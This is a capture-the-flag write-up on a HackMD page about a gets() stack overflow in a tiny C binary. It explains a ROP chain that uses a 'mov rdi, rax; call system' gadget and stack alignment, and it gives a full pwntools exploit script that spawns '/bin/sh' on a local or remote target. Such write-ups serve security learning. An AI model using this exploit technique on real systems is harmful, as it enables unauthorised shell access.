There is no commentSelect some text and then click Comment, or simply add a comment to this page from below to start a discussion.
HackMD#include <stdio.h>
#include <stdlib.h>
void main() {
char buf[0x10];
system("echo Enter something:");
gets(buf);
}
There is an obvius stack overflow.
The gadgets in the binary are limited, we can use
the return value (rax) of gets which is buf
and this gadget:
.text:0000000000401169 mov rdi, rax
.text:000000000040116C call _system
to set rdi to buf in which we can write /bin/sh
we need also to pad our chain with 2 ret to align the stack
otherwise system will crash due to movaps.
#!/bin/env python3
from pwn import *
elf = context.binary = ELF("./chall")
context.arch = 'amd64'
context.terminal = ['tmux','splitw','-h']
io = None
convert = lambda x :x if type(x)==bytes else str(x).encode()
s = lambda data :io.send(convert(data))
sl = lambda data :io.sendline(convert(data))
sla = lambda delim,data :io.sendlineafter(convert(delim), convert(data), timeout=context.timeout)
ru = lambda delims, drop=True :io.recvuntil(delims, drop, timeout=context.timeout)
r = lambda n :io.recv(n)
rl = lambda :io.recvline()
HOST, PORT = '10.10.10.10', 1337
gdbscript = '''
set follow-fork-mode parent
br *main+46
br *main+39
c
'''
def start():
if args.GDB:
return gdb.debug(elf.path, gdbscript=gdbscript)
if args.REMOTE:
return remote(HOST, PORT)
else:
return process(elf.path)
io = start()
ret = 0x40101a
mov_rdi_rax = 0x401169
payload = b"/bin/sh\x00" * 3 + p64(ret)*2 + p64(mov_rdi_rax)
sl(payload)
io.interactive()
or
By clicking below, you agree to our terms of service.
Sign in with Wallet
New to HackMD? Sign up